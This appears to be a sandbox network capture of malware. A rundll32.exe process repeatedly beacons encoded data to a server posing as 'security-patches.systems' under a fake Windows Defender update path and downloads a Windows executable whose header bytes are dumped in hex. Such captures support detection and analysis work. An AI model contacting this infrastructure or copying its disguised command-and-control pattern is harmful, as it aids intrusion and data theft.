Dec 6, 2024 22:14:53.333367109 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50124	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:53.596358061 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:55.059056997 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50125	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:55.334173918 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:56.779381037 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50126	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:57.033041000 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:58.510720015 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50127	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:58.770342112 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:00.219690084 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50128	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:15:00.488408089 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:01.977852106 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50129	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:15:02.237783909 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:03.694930077 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50130	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:15:03.957422018 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:05.484972954 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50131	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:15:05.753508091 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:07.202811003 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50132	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:15:07.516829967 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:09.017153978 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50134	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:15:09.285686016 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:15:10.834326982 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.234.216.175	443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:06 UTC	125	OUT	GET /AdminAccounts.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:11:06 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 06 Dec 2024 08:34:45 GMT ETag: "4e000-62895e318030d" Accept-Ranges: bytes Content-Length: 319488 Connection: close
2024-12-06 21:11:06 UTC	7940	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 b9 36 3d c4 d8 58 6e c4 d8 58 6e c4 d8 58 6e 17 aa 5b 6f ce d8 58 6e 17 aa 5d 6f 4c d8 58 6e 17 aa 5c 6f d0 d8 58 6e c2 59 5d 6f db d8 58 6e c2 59 5c 6f d4 d8 58 6e c2 59 5b 6f d0 d8 58 6e 17 aa 59 6f cf d8 58 6e c4 d8 59 6e b2 d8 58 6e ae 59 5d 6f c6 d8 58 6e ae 59 58 6f c5 d8 58 6e ae 59 5a 6f c5 d8 58 6e 52 69 63 68 c4 d8 58 6e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6=XnXnXn[oXn]oLXn\oXnY]oXnY\oXnY[oXnYoXnYnXnY]oXnYXoXnYZoXnRichXnPEL
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: c7 45 b0 66 4c e7 ea 89 55 b4 a0 44 a1 04 10 88 45 ff c7 45 dc 22 00 00 00 8b 0d 78 a1 04 10 33 d2 89 8d 14 fd ff ff 89 95 18 fd ff ff c7 85 38 fd ff ff 6f 9d ef f4 c6 45 95 40 0f b6 05 bb a0 04 10 99 89 85 0c fd ff ff 89 95 10 fd ff ff a1 d8 a0 04 10 8b 0d dc a0 04 10 89 8d 34 fd ff ff 89 85 30 fd ff ff c6 45 83 5f 8b 15 88 a1 04 10 a1 8c a1 04 10 89 85 2c fd ff ff 89 95 28 fd ff ff 8b 0d 40 a1 04 10 89 8d 24 fd ff ff 8b 15 18 a1 04 10 89 95 20 fd ff ff a0 28 a1 04 10 88 45 96 8b 0d 68 a1 04 10 8b 15 6c a1 04 10 89 8d 04 fd ff ff 89 95 08 fd ff ff 66 0f be 05 3f a0 04 10 66 89 85 9c fe ff ff 33 c9 c7 85 fc fc ff ff 4c 99 fc 6e 89 8d 00 fd ff ff 8b 15 30 a1 04 10 a1 34 a1 04 10 89 85 1c fd ff ff 88 55 97 66 0f b6 0d bc a0 04 10 66 89 8d a0 fe ff ff 8b 15 Data Ascii: EfLUDEE"x38oE@40E_,(@$ (Ehlf?f3Ln04Uff
